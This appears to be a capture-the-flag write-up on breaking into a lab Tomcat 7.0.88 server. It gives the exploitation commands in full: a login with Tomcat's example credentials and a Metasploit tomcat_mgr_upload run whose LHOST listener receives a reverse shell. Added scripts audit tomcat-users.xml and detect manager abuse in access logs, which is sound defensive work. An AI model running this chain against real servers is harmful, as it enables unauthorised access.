Fingerprinting
To begin, we need to gather some information about our target system. First, we set the target IP address as follows:
export ip=10.10.10.95
To determine the operating system, we ping the host and observe the TTL value in the reply. Here the TTL is 127: Windows hosts send packets with an initial TTL of 128, and the single router hop between us and the target decrements it by one, so the target is likely running Windows.
nmap -Pn $ip
The scan reveals an open port 8080/tcp running Apache Tomcat with the Coyote JSP engine version 1.1. The script output also gives us the HTTP server header, the page title, and the favicon.
Vulnerability Discovery
To discover potential vulnerabilities specific to Apache Tomcat version 7.0.88, we employ the “searchsploit” tool:
searchsploit tomcat 7.0.88
The search results display two entries that appear relevant. Upon inspecting the files, we find a common CVE number, CVE-2017-12617, associated with both.
Exploiting CVE-2017-12617
Next, we proceed to exploit the identified vulnerability using a Python script available on GitHub:
git clone https://github.com/cyberheartmi9/CVE-2017-12617
cd CVE-2017-12617
python2 tomcat-cve-2017-12617.py -u http://$ip:8080
Unfortunately, the script reports that the target is not vulnerable to the CVE-2017-12617 exploit.
Exploring Alternative Exploits
Further research indicates that an alternative exploit exists for the Tomcat manager. By examining the landing page, we can see that the manager is active.
To gain access, we attempt to authenticate with guessed credentials. After a few failed attempts, the page returns a 403 error whose body explains the administrative procedure for configuring manager logins, and it includes example credentials:
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
We use the provided credentials to log in successfully, enabling us to proceed with the exploit.
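The credentials above are the ones Tomcat's own error page shows as an example, and they work here because the administrator copied them into tomcat-users.xml verbatim. The following script is an added example, not part of the original post, that audits a tomcat-users.xml file for exactly this class of mistake: any account holding a manager or admin role whose credentials are the documented example pair, whose password equals its username, or whose password is shorter than a local policy threshold. The sample XML, the 12-character minimum and the "deployer"/"ops" accounts are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml, modelled on the <role>/<user> example
# shown in the Tomcat error page. This is sample data, not a file from any host.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Xk9!vR2m#pL4qW7z" roles="manager-script"/>
  <user username="ops" password="ops" roles="admin-gui,manager-gui"/>
</tomcat-users>
"""

# The username/password pair Tomcat's error page prints as an example.
DOC_EXAMPLE_CREDENTIALS = {("tomcat", "s3cret")}

# Roles that grant deployment or administrative access to the manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

MIN_PASSWORD_LEN = 12  # assumption: local password policy threshold


def _local_name(tag):
    """Strip the XML namespace prefix ElementTree adds to tag names."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, reason, sorted privileged roles) for each weak privileged account."""
    root = ET.fromstring(xml_text)
    findings = []
    for element in root.iter():
        if _local_name(element.tag) != "user":
            continue
        name = element.get("username", "")
        password = element.get("password", "")
        roles = {r.strip() for r in element.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue  # unprivileged accounts are out of scope for this check
        if (name, password) in DOC_EXAMPLE_CREDENTIALS:
            findings.append((name, "documentation example credential", sorted(privileged)))
        elif password.lower() == name.lower():
            findings.append((name, "password equals username", sorted(privileged)))
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append((name, "password shorter than policy minimum", sorted(privileged)))
    return findings


if __name__ == "__main__":
    for username, reason, roles in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{username}: {reason} (roles: {', '.join(roles)})")
```

Beyond fixing the password itself, the manager application should not be reachable from arbitrary networks: Tomcat ships a RemoteAddrValve in the manager's context.xml (enabled by default in 8.5 and later) that limits access to localhost, and the manager-gui and manager-script roles should be held by separate accounts so a browser login cannot also script deployments.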
Exploiting Tomcat Manager
To exploit the Tomcat manager (its WAR deployment feature, now reachable with the credentials above), we utilise the Metasploit Framework. First, we launch the Metasploit console:
msfconsole
Within the console, we load the appropriate exploit module:
use exploit/multi/http/tomcat_mgr_upload
We configure the required parameters for the exploit, such as the target IP address, port, our listening IP address, and the provided authentication credentials:
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.4
set HttpPassword s3cret
set HttpUsername tomcat
Finally, we execute the exploit:
run
Upon successful execution, we obtain a shell on the target system, granting us further control and access.
cd C:\\Users\\Administrator\\Desktop\\flags
cat 2\ for\ the\ price\ of\ 1.txt
This retrieves both the user and root flags from the target system, which are stored together in the single file above.
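From the server's side, the whole sequence above leaves a clear trail in the Tomcat access log: a run of 401/403 responses on /manager/html from one client, then an authenticated POST to /manager/html/upload (the HTML manager's WAR upload endpoint, which is what tomcat_mgr_upload drives) followed by a request for the freshly deployed application. The following script is an added example, not part of the original post, that runs a simple detection over Tomcat access-log lines in the default "%h %l %u %t "%r" %s %b" pattern. The log lines, the timestamps, the nonce value and the application path are constructed for the example; the failure threshold and the source allowlist are assumptions a site would tune.

```python
import re
from collections import defaultdict

# Constructed Tomcat access-log lines (default AccessLogValve pattern). The
# 10.10.14.4 address is the attacking host from the writeup; everything else
# here is sample data, not captured output.
SAMPLE_ACCESS_LOG = """\
10.10.14.4 - - [19/Jun/2018:10:01:12 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [19/Jun/2018:10:01:20 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.4 - - [19/Jun/2018:10:01:31 +0000] "GET /manager/html HTTP/1.1" 403 3420
10.10.14.4 - tomcat [19/Jun/2018:10:02:05 +0000] "GET /manager/html HTTP/1.1" 200 11042
10.10.14.4 - tomcat [19/Jun/2018:10:02:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLE HTTP/1.1" 302 0
10.10.14.4 - - [19/Jun/2018:10:02:41 +0000] "GET /AbCdEf12/index.jsp HTTP/1.1" 200 0
192.0.2.10 - admin [19/Jun/2018:11:00:00 +0000] "GET /manager/html HTTP/1.1" 200 11042
"""

ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoints through which a WAR can be deployed: the HTML manager's upload
# form and the text interface's deploy command.
DEPLOY_ENDPOINTS = (("POST", "/manager/html/upload"), ("PUT", "/manager/text/deploy"))

FAIL_THRESHOLD = 2  # assumption: auth failures before a deploy that we consider suspicious


def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    match = ACCESS_LOG_RE.match(line)
    if not match:
        return None
    record = match.groupdict()
    record["status"] = int(record["status"])
    record["path"] = record["path"].split("?", 1)[0]  # drop the query string
    return record


def is_deploy(record):
    return any(record["method"] == method and record["path"].startswith(path)
               for method, path in DEPLOY_ENDPOINTS)


def detect_manager_abuse(lines, allowed_sources=frozenset()):
    """Flag manager deployments preceded by auth failures or from non-allowlisted sources."""
    failures = defaultdict(int)  # auth failures on /manager/ per client IP
    alerts = []
    for line in lines:
        record = parse_line(line)
        if record is None or not record["path"].startswith("/manager/"):
            continue
        if record["status"] in (401, 403):
            failures[record["ip"]] += 1
            continue
        if is_deploy(record):
            reasons = []
            if failures[record["ip"]] >= FAIL_THRESHOLD:
                reasons.append(f"{failures[record['ip']]} auth failures before deploy")
            if record["ip"] not in allowed_sources:
                reasons.append("deploy from non-allowlisted source")
            if reasons:
                alerts.append({"ip": record["ip"], "user": record["user"],
                               "ts": record["ts"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_manager_abuse(SAMPLE_ACCESS_LOG.splitlines()):
        print(f"{alert['ts']} {alert['ip']} as {alert['user']}: {'; '.join(alert['reasons'])}")
```

Deployments are rare, high-impact events on a Tomcat host, so even the second rule alone (any deploy from an address outside the build or release system) is a low-noise alert; the failure counter adds the credential-guessing context that distinguishes the sequence above from a legitimate release.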
Conclusion
In this blog post, we demonstrated the process of identifying and exploiting a vulnerability in Apache Tomcat version 7.0.88. Although the initial CVE-2017-12617 exploit was unsuccessful, we discovered an alternative exploit through the Tomcat manager. By leveraging this exploit, we gained unauthorised access to the target system and retrieved valuable information.